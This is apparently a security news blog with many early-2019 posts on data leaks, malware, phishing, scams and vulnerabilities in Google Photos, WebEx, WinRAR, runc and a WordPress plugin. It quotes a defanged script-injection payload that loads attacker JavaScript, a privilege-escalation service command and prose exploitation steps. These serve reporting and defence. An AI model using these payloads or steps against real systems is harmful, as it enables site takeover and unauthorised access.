Saturday, March 23, 2019

Metadata remnants patched on Google Photos

   A bug was discovered this week in Google Photos, where all photos in a users Google Photo account could have their metadata easily read and collected. Bad actors would target a particular query, for example, a location, and then measure the time it takes for the website to respond. Even though the response might be an access denied, there is value in knowing it’s presence or not. It is possible to confirm or deny the presence of particular tags in the photo when using this cross site search method of attack.

    Location is probably one of the more dangerous pieces of information that can be leaked using this attack as it is possible to build a timeline of the victim’s travels and location using consecutive searches. In the original report of this issue, the researcher was able to divine the approximate date and time of a visit to another country using a malicious website by interacting with a logged in google photos account.

    While this attack doesn’t give any access to the photos themselves, or anything other than whether or not the specified terms/queries exist, the benefits can be extrapolated out to schedules and can allow for more finely crafted malvertisements or phishing attempts. One could imagine a malware ridden site harvesting emails, gaining access to location information, and then sending malicious emails being sent concerning issues with travel expenses to a location which is lent more credence by the fact that our victim has traveled to the given location within the time frame that the email is sent.

   While this exploit in particular has been patched, there are countless other browser side attacks that can be exploited, and safeguarding your data is paramount. This attack shows how a clever adversary can wield information no matter how small the leakage. Tools are available for content control to prevent data leakage. Tools such as PuriFile can help you manage metadata, scrub documents of sensitive terms and information, and even help detect data that may be obfuscated.


Thanks to Peraton for this information


Please share important information  this with those who you know.

United States Attorney William P. Barr recently stated that crimes against the elderly target some of the most vulnerable people in our society. Because of their stage in life, they don't have the opportunity frequently to recover, and the losses are devastating to them.
Whether as the result of isolation, diminished cognition, financial insecurity, trusting too much, being ashamed to report being scammed or concerned about how relatives will react, serious concern for health or other causes, many of these crimes go unreported.

Information on The Federal Bureau of Investigation Site

Information on The Department of Justice Site

The video below discusses scams and identity theft, looks at trends and gives tips and tools with a focus on the Federal Trade Commission's Pass It On  Campaign: 

Extent of elder abuse, causes and characteristics, addressing mistreatment, financial exploration and perpetrators:

Abuse by caregivers, domestic violence, fraud and financial abuse, training resources and tools, and additional information and resources:

Contains prosecutor video series, federal financial exploitation resources, rural and tribal resources, multidisciplinary guide and toolkit, webinars for elder abuse professionals, elder abuse statutes and elder justice resources by state:

Information on The Better Business Bureau Site

The BBB tracks reported scams throughout the U.S.

If you become aware of elder fraud and/or abuse, you are right to be concerned. If you SEE SOMETHING, please SAY SOMETHING in a timely manner to law enforcement, security and/or your supervisor, and give the authorities the chance to make a difference.

Friday, March 15, 2019

The Virtual Security Summit by Microsoft

This free event has lots of good content the session are listed below. the event is Streaming Live April 16 , 9-12 noon PT.
To register go here

Featured Speakers
Securing emerging technologies

Learn about the new trends that will affect cybersecurity into the future of Internet of Things and Machine Learning, and learn how to maintain your organization’s resiliency throughout innovations in cybersecurity.

Sian John 
Chief Security Advisor, Microsoft EMEA 
Hafid Elabdellaoui 
Chief Security Advisor, Microsoft 
Evolution of cyberthreats: Customer conversation identity and threat

Join this discussion on the evolution of cyberthreats and the latest thinking on identity and threat protection tactics.
Joram Borenstein
General Manager, Cybersecurity Solutions Group, Microsoft
Kostas Georgakopoulos
Chief Information Security Officer, Procter & Gamble
The importance of security frameworks CIS, NIST and others

Fraud Detection as a Service (FDaaS) is helping government customers detect and prevent improper payments. Learn how your agency can save significant staff resources and ensure proper distribution of funds.
Curtis W. Dukes
Executive Vice President and General Manager
Security Best Practices and Automation Group, CIS
Sean Sweeney
Americas Director, Cybersecurity Solutions Group, Microsoft

Threat of Cryptojacking Still an Issue

In November of 2018 Forbes ran an article about the increase of cryptojacking. At the time the Cyber Threat Alliance (CTA) was indicating a 629% increase of infections in just the short time between Q1 to Q2 of 2018. Threats had grown from an estimated 400,000 (Q4 2017) infections to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example the Russian threat, WebCobra, that McAfee Labs researchers found, was able to drop one of two different payloads based on architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well.  360 Total Security researchers have released the details of the newer PsMiner malware. Designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from server to server to mine for Monero.

The worm uses a file called Systemctl.exe written in the Go language to bundle then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute force its way in to a system. When it detects weak or default credentials, it can utilize a brute force password cracking component.

Once it PsMiner has access to a system, it then uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and master module that will drop the Monero miner on the system. The malware then copies itself into the temp directory and create a scheduled task called “Update service for Windows Service” that will run once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while using Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows a level of sophistication to which the bad actors have access.  Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These Apps have been since removed from the Microsoft store, but show a troubling pattern of predatory behavior.  Estimates are indicating that there have been ten times more organizations affected by cryptojacking than ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources -worm-uses-cryptojacking-module-to-mine-for-monero/

Abandoned Cart plugin for WordPress sites exploit.

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard.  The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email.  The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn't address the code injection in the deactivated plugins.



Friday, March 1, 2019

New Elevation of Privilege Vulnerability in Cisco Webex

     A new elevation of privilege vulnerability has been discovered in the Cisco WebEx Meetings desktop app for Windows® by security researcher Marcos Accossatto from SecureAuth Exploits’ Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS Command Injection that can be used to bypass new controls that Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. This vulnerability could allow a local attacker to elevate their privileges by invoking the update service command. An attacker could exploit this flaw by swapping out the Cisco WebEx Meetings update binary with “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while this vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory setup through operating system remote management tools.

    The update service for Cisco WebEx Meetings uses XML to check against new files when installing an update. However, this vulnerability would fail to validate version numbers of new files. This is how attackers could potentially insert different files into the update service and trick the update service into “updating” the program to an older, insecure version of Cisco WebEx Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn't work, then 2 should be used).” The research team also released a two-step Proof of Concept showing how this vulnerability can be exploited.

     The timeline for this vulnerability is about 2 months long and is as follows: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed they received the advisory and opened a case for it, and on Dec. 7, 2018, Cisco confirmed that they were able to reproduce the vulnerability and began working on a plan to fix it. On Dec. 10, 2018, Cisco told SecureAuth that the fix for the vulnerability would be generally available by the end of February. After a couple of attempts by SecureAuth to get updates on the status of the patch for the vulnerability, Cisco, on Jan. 22, 2019, said they were still aiming for an end of February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and have now disclosed a patch for this security vulnerability.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.

Thursday, February 28, 2019

CenturyLink Announces New Threat Research on Necurs

"Necurs is the multitool of botnets, evolving from operating as a spam botnet delivering banking trojans and ransomware to developing a proxy service, as well as cryptomining and DDoS capabilities," said Mike Benjamin, head of Black Lotus Labs. "What's particularly interesting is Necurs' regular cadence of going dark to avoid detection, reemerging to send new commands to infected hosts and then going dark again. This technique is one of many the reasons Necurs has been able to expand to more than half a million bots around the world."

Key Takeaways

  • Beginning in May of 2018, Black Lotus Labs observed regular, sustained downtime of roughly two weeks, followed by roughly three weeks of activity for the three most active groups of bots comprising Necurs.
  • Necurs' roughly 570,000 bots are distributed globally, with about half located in the following countries, in order of prevalence: India, Indonesia, Vietnam, Turkey and Iran. 
  • Necurs uses a domain generation algorithm (DGA) to obfuscate its operations and avoid takedown. However, DGA is a double-edged sword: because the DGA domains Necurs will use are known in advance, security researchers can use methods like sinkholing DGA domains and analyzing DNS and network traffic to enumerate bots and command and control (C2) infrastructure.
  • CenturyLink took steps to mitigate the risk of Necurs to customers, in addition to notifying other network owners of potentially infected devices to help protect the internet. 

Additional Resources

SOURCE CenturyLink, Inc.

Tuesday, February 26, 2019

ICANN urges adopting DNSSEC now

With DNS server being attacked all over the world, The Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. The organization also reaffirms its commitment to engage in collaborative efforts to ensure the security, stability and resiliency of the Internet’s global identifier systems.

As one of many entities engaged in the decentralized management of the Internet, ICANN is specifically responsible for coordinating the top-most level of the DNS to ensure its stable and secure operation and universal resolvability.

On 15 February 2019, in response to reports of attacks against key parts of the DNS infrastructure, ICANN offered a checklist of recommended security precautions for members of the domain name industry, registries, registrars, resellers, and related others, to proactively take to protect their systems, their customers’ systems and information reachable via the DNS.

Public reports indicate that there is a pattern of multifaceted attacks utilizing different methodologies. Some of the attacks target the DNS, in which unauthorized changes to the delegation structure of domain names are made, replacing the addresses of intended servers with addresses of machines controlled by the attackers. This particular type of attack, which targets the DNS, only works when DNSSEC is not in use. DNSSEC is a technology developed to protect against such changes by digitally 'signing' data to assure its validity. Although DNSSEC cannot solve all forms of attack against the DNS, when it is used, unauthorized modification to DNS information can be detected, and users are blocked from being misdirected.

ICANN has long recognized the importance of DNSSEC and is calling for full deployment of the technology across all domains. Although this will not solve the security problems of the Internet, it aims to assure that Internet users reach their desired online destination by helping to prevent so-called “man in the middle” attacks where a user is unknowingly re-directed to a potentially malicious site. DNSSEC complements other technologies, such as Transport Layer Security (most typically used in HTTPS) that protect the end user/domain communication.

As the coordinator of the top-most level of the DNS, ICANN is in the position to help mitigate and detect DNS-related risks, and to facilitate key discussions together with its partners. The organization believes that all members of the domain name system ecosystem must work together to produce better tools and policies to secure the DNS and other critical operations of the Internet. To facilitate these efforts, ICANN is planning an event for the Internet community to address DNS protection: The first is an open session during the upcoming ICANN64 public meeting on 9-14 March 2019, in Kobe, Japan.

As we learn more information, updates may be provided. For information about ICANN64, visit

This article was a repost off of the ICANN site as a important security notice to all who use or have DNS servers.

Saturday, February 23, 2019

617 million accounts stolen

According to the 617million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts.

 Some 617 million online account details stolen from 16 hacked websites are on sale from today on the dark web, according to the data trove's seller.

For less than $20,000 in Bitcoin, it is claimed, the following pilfered account databases can be purchased from the Dream Market cyber-souk, located in the Tor network:
Dubsmash (162 million),
MyFitnessPal (151 million),
MyHeritage (92 million),
ShareThis (41 million),
HauteLook (28 million),
Animoto (25 million),
EyeEm (22 million),
8fit (20 million),
Whitepages (18 million),
Fotolog (16 million),
500px (15 million),
Armor Games (11 million),
BookMate (8 million),
CoffeeMeetsBagel (6 million),
Artsy (1 million), and
DataCamp (700,000).

The hacker told The Register that his goal in putting up the stolen accounts was to ‘make life easier for hackers’. He plans to sell the information to anyone who promises to keep the data secret. This attacker has been hacking accounts since 2012 and information on at least 20 databases.
Further, the hacker stated:
“I don’t think I am deeply evil. I need the money”
“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

To read the full article go here 

Social Media Phishing Attack

    Social media has changed how the world interacts with each other in so many ways, such as closer interaction between businesses and their customers, law enforcement alerts, and more.  Creators of public content that want any real degree of reach involves social media in their business and marketing plan somehow, including many requiring logging in through social media to view content.

    There are many methods to ensure that a login prompt is legit, but a new phishing technique
discovered by researchers at password management company MyKi throws the usual precautions out the window. Phishing is a fraudulent attempt to gain sensitive personal information through posing as a legitimate entity, such as a company or a website. It is a form of social engineering and is very popular and successful due to the willingness of many to take things on the internet at face value.

    Recent years have shown an increase in phishing attempts leading to serious data breaches, as was the case in the San Diego Unified School District breach involving social security numbers and other personal information of over 500,000 students and staff. 
    Researchers at Myki discovered the attackers were convincing victims to visit fraudulent sites for blogs and services that first required people to log in with a Facebook account to access the content. The sites looked legitimate, as did the pop-up window for the Facebook login: the URL was for, it was using HTTPS with a green padlock to show a valid certificate, and browser addons for detecting malicious domains weren’t throwing any warnings. However, their credentials were still harvested by the attacker. The pop-up window was not a real window: it was created with HTML and JavaScript to imitate a real browser window but was part of the original page.

    The only way to tell is to try to drag the window away from the browser. If it is fake then part of the window will disappear past the edge of the browser instead of moving as a separate entity. While harvesting Facebook login credentials may not seem like much of a threat beyond seeing what cat pictures were posted by friends, many people use the same or similar credentials across many sites and this gives attackers a jump ahead in trying to gain unauthorized access to other accounts. Also, this same technique could show up in other areas in the future, such as e-commerce sites asking for PayPal logins or something similar.


Vulnerability So Old it Could Vote

     This past week, a vulnerability has been found in the WinRAR archive extraction software that has existed for almost 19 years. It was discovered by researchers at Check Point Software Technologies. The exploit allows for a path traversal which leads to remote code execution anywhere on the system. This issue stems from a third party dll, unacev2.dll, that is used to handle the .ace archive type.
    This bug was discovered through fuzzing the WinRaR program and identifying the root cause of a crash. When the group identified the problem, they looked for a memory corruption bug, but instead found a logical bug which let the team navigate to any location on the target machine without even needing to know a user name.
     When testing to identify the root cause of the bug, the fuzzer was used and they detected an anomaly where bits of the advertisement string and other pieces of the file’s hex dump were placed in a created directory and file.
     They were unable to recreate it exactly due to the file name validation functions of WinRaR when attempting to utilize this similar issue inside of WinRaR. Even though the original case is caught by WinRaR, the unacev2.dll function return is cancelled by WinRar, the folder is still created temporarily due to a late check for the value that calls for cancellation.
     This allows for the creation of empty files wherever the creator would like.  The team goes a step farther and circumvents the path limitations set by WinRar using the cleanPath function that WinRaR uses to remove extraneous ‘C:/’ from relative paths. By adding another ‘C:/’ the team was able to bypass this and gain Path Traversal because the WinRaR path Check does not look for the ‘C:’. It was supposedly removed by cleanPath. With a Path Traversal Vulnerability found, the team was able to gain access to an SMB attack vector by adding more arbitrary ‘C:/’ to strings to allow connections. Code execution is obtained by extracting a compressed executable file from an ace archive that’s been renamed to a .rar to a startup folder which will run the code on machine boot. The code itself is arbitrary and the consequences of this can be catastrophic.    

    You can even ignore usernames using the WinRar subkeys by right clicking on the archive in question, and moving it using that tool. This works because of how ‘C:’ is interpreted by windows. It represents the current directory of the running process, so inside of the WinRaR gui, it would be the WinRar folder, but using the menu option, it becomes C:\Users\<user name>\<location of the file>. When this exploit was reported to WinRar, they claimed that it was the third party’s code that allowed the arbitrary folder creation and decided to drop the support for the ACE archive format. 


Container Escape

    Over the years there has been a fundamental shift in evolving software development practices. In the past it was typical to build and maintain large monolithic code bases and run it on large servers, individual virtual machines, or even bare metal. Now, like many of us know already, many applications are being packaged as small services, loosely coupled together into what is called microservices architecture across a smaller group of distributed commodity hardware. The nature of this security infrastructure creates layers between application and host environments, facilitates fast and easy application of patches and updates across the technologies, and helps to maintain overall security compliance.
    This past January there was a severe vulnerability disclosure affecting these containerized environments, which allows an attacker to escape from container to host system via docker-runc identified as CVE2019-5736. This vulnerability affects containerized technologies such as cri-o, containerd, and Kuerbenetes and it is to note an attacker would have to have root level access within the target container. Then an attacker would need to create a nefarious binary that is run on user entry. According to researcher’s attack description an attacker would then need their code execution to replace any dynamic library used by docker-runc with a custom .so file that has an additional global constructor. This function opens /proc/self/ exe for reading and then executes another binary which opens this time for writing to /proc/self/fd/3, which is a file descriptor of docker-runc which is opened before execve. An attacker could essentially subsequently write to the docker-runc file descriptor any arbitrary code they wish which would then overwrite the original docker-runc file on the system host and affect the host operating system.
    As researchers describe the attack timeline, when a host user runs the affected container, the new docker-runc process is executed within the container but using the actual binary on the host file system. The docker-runc process however, loads the attacker controlled .so files from the container file system. The malicious global constructor function will be executed and load the attacker controlled binary. This binary overwrites the docker-runc on the host file system with a compromised docker-runc. Then when any user starts a docker image on the host file system the compromised docker-runc file is executed within the host environment, which fully compromises that system.
    A fix to docker-runc was created, the applied code creates a memory based file descriptor, which loads a known good docker-runc binary. Before entering namespaces docker-runc is then run from the memory based file descriptor so the docker-runc on the host file system cannot be overridden. There also are other potential mitigations that involve appropriately configuring SELinux, configuring appropriate affected files to read-only, and lowering privileges of users inside of containers.

• https://

Wednesday, February 13, 2019

"Catastrophic” hack on VFEmail destroys almost two decades of data

!!!ALERT!!!! Update Feb 11 2019 and are currently unavailable in their prior form.
We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@
This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

Main points:

  • If you didn't use, then your mailbox is gone. Send yourself an email to re-create it (if necessary).
  • After the initial incident on 2/11, incoming mail was queued on the sending servers.
    These should have started coming in within 12 hours, creating new mailboxes for existing accounts - 'new' mail should not be lost.
  • Accounts exist, the mail data does not. If your mailbox hasn't been re-created, you can't login. Send yourself an email to re-create it.
  • If you're one of the 10% who used webmail, your addressbook and calendars still exist.
  • If you can't login, use to login to webmail.
  • If you used POP. Change your mail server to
  • If you used IMAP. CREATE A NEW ACCOUNT, and use for the server name.
  • There is no control panel
  • Consider your mailbox data to be lost, but we haven't given up yet.
Timeline -
As of 5am 2/11/19 and are currently unavailable.
We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@
This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.
New updates 2/11/19 6pm CST:
  • Incoming mail is now being delivered.
  • Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.
  • Mailboxes are new, no subfolders exist.
  • No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need.
    Click Filter, Click Script, then click 'Activate Script'.
  • There is no spam scanning at this time - Incoming mail may be Spam scanned depending on DNS status.
  • Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.
  • NL hosted email is available (if you bought and requested a Migraiton).
At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.
If you reconnect your client to your new mailbox, all your local mail will be lost.
AT YOUR OWN RISK - POP users can use ''
IMAP Users should create a new account, then use '' as the IMAP/SMTP server


  • If you are unable to login, send yourself an email from another location. Receipt of an email creates your new mailbox.
  • We have engaged a data recovery vendor to discuss options.
  • Mailboxes were shutdown for a short time while we move data between volumes
    We've used 11Gb of space in 2 days - FYI.
  • Vanity domains should receive mail properly now
  • If you were set to 'nobackup', you should start receiving mail now.
“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. “It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.”

VFEmail says data for virtually all US users is gone for good!

More about Windows Sandbox

Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine?

 At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted.

Windows Sandbox has the following properties:

  • Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
  • Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows
  • Disposable – nothing persists on the device; everything is discarded after you close the application
  • Secure – uses hardware-based virtualization for kernel isolation, which relies on the Microsoft’s hypervisor to run a separate kernel which isolates Windows Sandbox from the host
  • Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU
Prerequisites for using the feature

  • Windows 10 Pro or Enterprise Insider build 18305 or later
  • AMD64 architecture
  • Virtualization capabilities enabled in BIOS
  • At least 4GB of RAM (8GB recommended)
  • At least 1 GB of free disk space (SSD recommended)
  • At least 2 CPU cores (4 cores with hyperthreading recommended)

If you have this build here are the steps located here to implement this technology.

The information posted here comes from Microsoft

Tuesday, February 12, 2019

Internet Romance Scams Be Warned

The Federal Trade Commission (FTC) has released an article addressing a rise in reports of internet romance scams. In this type of fraud, cyber criminals gain the confidence of their victims and trick them into sending money. Use caution when online dating, and never send money or gifts to someone you have not met in person.

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users to review FTC’s article on Romance Scams and NCCIC’s tip on Staying Safe on Social Networking Sites. If you think you have been a target of a romance scam, file a report with

Ransomware Attack Via MSP Locks Customers Out of Systems

Vulnerable plugin for a remote management tool gave attackers a way to encrypt systems belonging to all customers of a US-based MSP.
An attacker this week simultaneously encrypted endpoint systems and servers belonging to all customers of a US-based managed service provider by exploiting a vulnerable plugin for a remote monitoring and management tool used by the MSP.

The attack resulted in some 1,500 to 2,000 systems belonging to the MSP's clients getting cryptolocked and the MSP itself facing a $2.6 million ransom demand.

Discussions this week on an MSP forum on Reddit over what appears to be the same — or at least similar — incident suggest considerable anxiety within the community over such attacks, with a few describing them as a nightmare scenario.

To read the full article go here

Saturday, February 9, 2019

Googlle Store Has Vanity Apps Opens Users Up To Attack

    Some people like to look their best and sometimes reality just isn’t enough. With the addition of an altered reality landscape we can add and modify our worlds and ourselves through the lens of our phones. There are apps that can access your phone’s camera, detect your facial position, add features, correct color imbalances, enhance traits that we find desirable, and can remove elements that aren't so desirable. 

    Researchers at Trend Micro have found 29 beauty apps in the Google Play store that have malicious traits. These apps take a user’s desire to be more than what they are to open themselves up for attack. They are connected to remote ad configuration servers that receive data about the device the malicious app is installed upon and directs the victim to attacks tailored for that device.

    The authors of these malicious apps have included efforts to hide traces of their existence in a feeble attempt at permanence. Once downloaded, one of the packages included in these apps will provide the user a shortcut icon to impale themselves upon, but it will hide the app icon from the application list in an attempt to prevent its own deletion. 

    These apps have several methods of monetizing their targets including phishing for personal information, collecting freshly taken photos, or even just accepting payments for services not rendered. They can include false “contests” that result in a request for personal information to deliver a promised prize. One app offers beautification of an image uploaded to its server but never gets it, while the attacker compiles a data set full of images that can be used for future fraudulent social media profiles. Another app pushes an ad for a paid online pornography player which accepts payment and likely collects payment information. The researchers have found that the player does not play despite payment.

    The Google Play Store has already removed these apps from their roster. The top three (Pro Camera Beauty, Cartoon Art Photo, & Emoji Camera) have had over one million downloads each. The next eight have already had downloads in the hundreds of thousands. The large majority of these downloads occurred in Asia, particularly India. 

   The best recommendation is to read reviews in any app that you want to try out. Any reviews that are indicative of malicious behavior is sufficient warning. Anything produced by an untrusted source should be subject to scrutiny, and anything requesting information should be doubly so.
Source trendlabs-security-intelligence/ various-google-play-beauty-cameraapps-sends-users-pornographiccontent-redirects-them-to-phishingwebsites-and-collects-their-pictures/ news/0890709908/google-removes29-malicious-android-camera-appsfrom-play-store wordpress/80666/malware/ malicious-beauty-apps.html

Shortcut to Fear

     Siri sets alarms, calls your mother, and finds you that piece of trivia that’s been itching in your brain for the past week. Siri helps people manage their electronic fears and control their digital world in a human way. So when Siri Shortcuts came along with iOS 12, I’m sure many people were elated at the thought of automating their daily ritual and streamlining repeated complex tasks. 

    While it’s doubtful that most users will automate their household energy consumption or repeatedly perform multi step computations via voice command, the average user might be interested in shortcuts designed by business owners trying to make it smoother to exchange money for services and goods. Also, it just feels a bit cool to do many things with just a click. However, with automation and complexity there’s always an avenue for abuse. Security Intelligence from IBM has outlined a few methods for a pseudo ransom attack involving many of the capabilities of Siri Shortcut.

    The app has the ability to perform many of the phone’s basic functions which can be used to confuse then scare a user into paying a ransom to the attacker. Some of Siri Shortcuts’ capabilities include text to speech, flash light control, vibration control, volume and brightness control, clipboard data collection, data storage manipulation, IP address collection, GPS location information collection, and other forms of information collection.

   The most alarming capability is message creation and deployment along with contact list access. A maliciously crafted shortcut could send a copy of itself to each person in the victim’s contact list. It has been advised time and again to never download anything from an untrusted source, but who would think your grandson would send you anything malicious? Suddenly you’re at an ATM, your phone is vibrating and flashing, it snaps a picture of your face and your bank card, and tells you that you’re being tracked repeating your location and reading your browsing history. Even the most cool-headed person would be shaken and might fall for  the ruse. And if you’re savvy enough to remain composed and ignore it, a co-worker or a cousin might not be.

   A pound of cure is worth an ounce of prevention. Never install shortcuts from untrusted sources. Never allow anything to exist on your phone that requires permissions outside your comfort zone. Take advantage of the “Show Actions” button to see what a shortcut actually does before using it. Constant vigilance when it comes to anything that can run without your direct control is the minimum in this day and age.

 • -ibm

Thursday, January 31, 2019

IDenticard PremiSys vulnerabilities

Industrial Control Systems Cyber Emergency Response Team Advisory: 
01/31/2019 10:00 AM EST
This advisory provides mitigation recommendations for use of hard-coded credentials,
use of hard-coded password, and inadequate encryption strength vulnerabilities
reported in the IDenticard PremiSys access control system.   


Wednesday, January 30, 2019

Cybersecurity Awareness Briefings

DHS Header

    Cybersecurity Awareness Briefings Start Next Wednesday
Webinar: Chinese Cyber Activity Targeting Managed Service Providers
On December 20, 2018, the Cybersecurity and Infrastructure Security Agency (CISA)
 announced that malicious actors working on behalf of the Chinese government have
been carrying out a campaign of cyber attacks targeting managed service providers (MSPs).
Victims of these attacks have suffered from the loss of sensitive or proprietary information,
 as well as service disruptions, financial loss, and reputational harm. Organizations of all
sizes, from all sectors, are still at risk for similar attacks in the future. Previously posted
information on this threat can be found here:

Join CISA for a virtual Awareness Briefing to review the background of this threat, as  
well as recommended steps MSPs and their customers can take to protect themselves
from future attacks.

Register now for one of two upcoming Awareness Briefings.
 Content is the same for each session.
  • Wednesday, February 6 at 1:00 p.m. ET
  • Friday, February 22 at 1:00 p.m. ET
Registration is limited, so please register early to guarantee your spot.
This is the latest installment in CISA’s ongoing Awareness Briefing series.
  Recordings of previous Awareness Briefings are available at

Chinese APT10 intrusion activities target Government, Cloud-Computing Managed Service Providers and Customer networks worldwide

The following information is being provided by the FBI, with no guarantees or warranties, for potential use at the sole discretion of recipients in order to protect against cyber threats. This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious actions of cyber criminals.  

This FLASH has been released TLP:WHITE. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.

Chinese APT10 intrusion activities target Government, Cloud-Computing Managed Service Providers and Customer networks worldwide. The following information was obtained through FBI investigations and is provided in accordance with the FBI's mission and policies to prevent and protect against federal crimes and threats to the national security.

The FBI is providing the following information with HIGH confidence:


The FBI obtained information regarding a group of Chinese APT cyber actors stealing high value information from commercial and governmental victims in the U.S. and abroad.  This Chinese APT group is known within private sector reporting as APT10, Cloud Hopper, menuPass, Stone Panda, Red Apollo, CVNX and POTASSIUM.  This group heavily targets managed service providers (MSP) who provide cloud computing services; commercial and governmental clients of MSPs; as well as defense contractors and governmental entities.  APT10 uses various techniques for initial compromise including spearphishing and malware.  After initial compromise, this group seeks MSP administrative credentials to pivot between MSP cloud networks and customer systems to steal data and maintain persistence.  This group has also used spearphishing to deliver malicious payloads and compromise victims.  

WE NEED YOUR HELP! If you find any of these indicators on your networks, or have related information, please contact  FBI CYWATCH immediately. Email: Phone: 1-855-292-3937

Tuesday, January 29, 2019

Deploying the Azure Information Protection scanner to automatically classify and protect files

If you heard me talk I say many time we need to start classify our data so the we can protect the critical files and add additional security to those files that are at the highest risk.
We need to protect data based on the risk.  You may have heard me talk About RMS (Right Management Service) or AIP (Azure information Protection). Here is an article on an tool that will help you find and automatically classify file for you.

This article is for the current general availability version of the Azure Information Protection scanner.

If you are looking for deployment instructions for the current preview of the scanner, which includes configuration from the Azure portal, see Deploying the preview version of the Azure Information Protection scanner to automatically classify and protect files.

Use this information to learn about the Azure Information Protection scanner, and then how to successfully install, configure, and run it.

This scanner runs as a service on Windows Server and lets you discover, classify, and protect files on the following data stores:

  • Local folders on the Windows Server computer that runs the scanner.
  • UNC paths for network shares that use the Server Message Block (SMB) protocol.
  • Sites and libraries for SharePoint Server 2016 and SharePoint Server 2013. SharePoint 2010 is also supported for customers who have extended support for this version of SharePoint.

To scan and label files on cloud repositories, use Cloud App Security.

Overview of the Azure Information Protection scanner

When you have configured your Azure Information Protection policy for labels that apply automatic classification, files that this scanner discovers can then be labeled. Labels apply classification, and optionally, apply protection or remove protection:
